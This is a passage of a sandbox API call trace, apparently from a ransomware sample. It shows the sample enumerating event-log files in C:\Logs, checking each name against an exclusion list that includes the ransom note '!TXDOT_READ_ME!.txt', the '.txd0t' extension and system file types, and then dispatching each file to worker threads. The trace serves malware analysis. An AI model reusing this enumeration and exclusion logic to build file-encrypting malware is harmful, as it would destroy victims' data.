psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.131] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" [0089.131] SetEvent (hEvent=0x408) returned 1 [0089.131] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbcf0ff2, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcbcf0ff2, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-NetworkProfile%4Operational.evtx", cAlternateFileName="MIFC66~1.EVT")) returned 1 [0089.131] StrCmpW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2=".") returned 1 [0089.131] StrCmpW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="..") returned 1 [0089.131] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.131] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.131] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-NetworkProfile%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" [0089.131] PathFindExtensionW (pszPath="Microsoft-Windows-NetworkProfile%4Operational.evtx") returned=".evtx" [0089.131] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.131] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="bootsect.bak") returned 1 [0089.131] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="iconcache.db") returned 1 [0089.131] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="thumbs.db") returned -1 [0089.131] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2=" ransomware ") returned 1 [0089.131] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2=" ransom ") returned 1 [0089.131] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="debug.txt") returned 1 [0089.131] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="boot.ini") returned 1 [0089.131] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="desktop.ini") returned 1 [0089.131] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="autorun.inf") returned 1 [0089.131] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="ntuser.dat") returned -1 [0089.131] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="ntldr") returned -1 [0089.131] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="ntdetect.com") returned -1 [0089.131] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="bootfont.bin") returned 1 [0089.131] StrCmpIW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.131] PathFindExtensionW (pszPath="Microsoft-Windows-NetworkProfile%4Operational.evtx") returned=".evtx" [0089.131] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.131] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0089.143] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.143] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" [0089.143] SetEvent (hEvent=0x408) returned 1 [0089.143] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ab3154, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ab3154, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Ntfs%4Operational.evtx", cAlternateFileName="MI6E98~1.EVT")) returned 1 [0089.143] StrCmpW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2=".") returned 1 [0089.143] StrCmpW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="..") returned 1 [0089.143] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.143] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.143] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Ntfs%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" [0089.143] PathFindExtensionW (pszPath="Microsoft-Windows-Ntfs%4Operational.evtx") returned=".evtx" [0089.143] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.143] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="bootsect.bak") returned 1 [0089.143] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="iconcache.db") returned 1 [0089.143] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="thumbs.db") returned -1 [0089.143] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2=" ransomware ") returned 1 [0089.143] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2=" ransom ") returned 1 [0089.143] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="debug.txt") returned 1 [0089.143] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="boot.ini") returned 1 [0089.143] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="desktop.ini") returned 1 [0089.143] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="autorun.inf") returned 1 [0089.143] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="ntuser.dat") returned -1 [0089.143] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="ntldr") returned -1 [0089.143] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="ntdetect.com") returned -1 [0089.143] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="bootfont.bin") returned 1 [0089.143] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.143] PathFindExtensionW (pszPath="Microsoft-Windows-Ntfs%4Operational.evtx") returned=".evtx" [0089.143] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.144] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0089.146] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.147] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" [0089.147] SetEvent (hEvent=0x410) returned 1 [0089.147] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ad9393, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ad9393, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Ntfs%4WHC.evtx", cAlternateFileName="MIB2AC~1.EVT")) returned 1 [0089.147] StrCmpW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2=".") returned 1 [0089.147] StrCmpW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="..") returned 1 [0089.147] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.147] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.147] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Ntfs%4WHC.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" [0089.147] PathFindExtensionW (pszPath="Microsoft-Windows-Ntfs%4WHC.evtx") returned=".evtx" [0089.147] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.147] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="bootsect.bak") returned 1 [0089.147] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="iconcache.db") returned 1 [0089.147] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="thumbs.db") returned -1 [0089.147] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2=" ransomware ") returned 1 [0089.147] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2=" ransom ") returned 1 [0089.147] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="debug.txt") returned 1 [0089.147] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="boot.ini") returned 1 [0089.147] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="desktop.ini") returned 1 [0089.147] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="autorun.inf") returned 1 [0089.147] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="ntuser.dat") returned -1 [0089.147] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="ntldr") returned -1 [0089.147] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="ntdetect.com") returned -1 [0089.147] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="bootfont.bin") returned 1 [0089.147] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.147] PathFindExtensionW (pszPath="Microsoft-Windows-Ntfs%4WHC.evtx") returned=".evtx" [0089.147] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.148] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0089.163] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.163] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" [0089.163] SetEvent (hEvent=0x408) returned 1 [0089.163] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5fe5cb, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5fe5cb, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", cAlternateFileName="MI6AFE~1.EVT")) returned 1 [0089.163] StrCmpW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2=".") returned 1 [0089.163] StrCmpW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="..") returned 1 [0089.163] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.163] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.163] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" [0089.163] PathFindExtensionW (pszPath="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned=".evtx" [0089.164] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.164] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="bootsect.bak") returned 1 [0089.164] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="iconcache.db") returned 1 [0089.164] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="thumbs.db") returned -1 [0089.164] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2=" ransomware ") returned 1 [0089.164] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2=" ransom ") returned 1 [0089.164] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="debug.txt") returned 1 [0089.164] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="boot.ini") returned 1 [0089.164] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="desktop.ini") returned 1 [0089.164] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="autorun.inf") returned 1 [0089.164] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="ntuser.dat") returned -1 [0089.164] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="ntldr") returned -1 [0089.164] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="ntdetect.com") returned -1 [0089.164] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="bootfont.bin") returned 1 [0089.164] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.164] PathFindExtensionW (pszPath="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned=".evtx" [0089.164] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.164] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0089.173] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.173] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" [0089.173] SetEvent (hEvent=0x410) returned 1 [0089.173] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe24cdef0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xe24cdef0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-ReadyBoost%4Operational.evtx", cAlternateFileName="MIB9D2~1.EVT")) returned 1 [0089.173] StrCmpW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2=".") returned 1 [0089.173] StrCmpW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="..") returned 1 [0089.173] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.173] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.173] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-ReadyBoost%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" [0089.173] PathFindExtensionW (pszPath="Microsoft-Windows-ReadyBoost%4Operational.evtx") returned=".evtx" [0089.173] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.173] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="bootsect.bak") returned 1 [0089.173] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="iconcache.db") returned 1 [0089.173] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="thumbs.db") returned -1 [0089.173] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2=" ransomware ") returned 1 [0089.173] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2=" ransom ") returned 1 [0089.173] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="debug.txt") returned 1 [0089.173] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="boot.ini") returned 1 [0089.173] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="desktop.ini") returned 1 [0089.173] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="autorun.inf") returned 1 [0089.173] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="ntuser.dat") returned -1 [0089.173] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="ntldr") returned -1 [0089.173] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="ntdetect.com") returned -1 [0089.173] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="bootfont.bin") returned 1 [0089.173] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.173] PathFindExtensionW (pszPath="Microsoft-Windows-ReadyBoost%4Operational.evtx") returned=".evtx" [0089.173] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.173] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0089.190] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.190] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" [0089.190] SetEvent (hEvent=0x418) returned 1 [0089.190] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd125335f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd125335f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", cAlternateFileName="MI7A67~1.EVT")) returned 1 [0089.190] StrCmpW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2=".") returned 1 [0089.190] StrCmpW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="..") returned 1 [0089.190] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.190] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.190] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" [0089.190] PathFindExtensionW (pszPath="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned=".evtx" [0089.190] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.190] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="bootsect.bak") returned 1 [0089.190] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="iconcache.db") returned 1 [0089.190] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="thumbs.db") returned -1 [0089.190] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2=" ransomware ") returned 1 [0089.190] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2=" ransom ") returned 1 [0089.190] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="debug.txt") returned 1 [0089.190] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="boot.ini") returned 1 [0089.190] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="desktop.ini") returned 1 [0089.190] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="autorun.inf") returned 1 [0089.190] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="ntuser.dat") returned -1 [0089.190] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="ntldr") returned -1 [0089.191] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="ntdetect.com") returned -1 [0089.191] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="bootfont.bin") returned 1 [0089.191] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.191] PathFindExtensionW (pszPath="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned=".evtx" [0089.191] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.191] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0089.199] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.199] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" [0089.199] SetEvent (hEvent=0x3fc) returned 1 [0089.199] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fe2941, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd1fe2941, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SettingSync%4Debug.evtx", cAlternateFileName="MI3773~1.EVT")) returned 1 [0089.199] StrCmpW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2=".") returned 1 [0089.199] StrCmpW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="..") returned 1 [0089.199] StrCpyNW (in: psz1=0xed3e88, 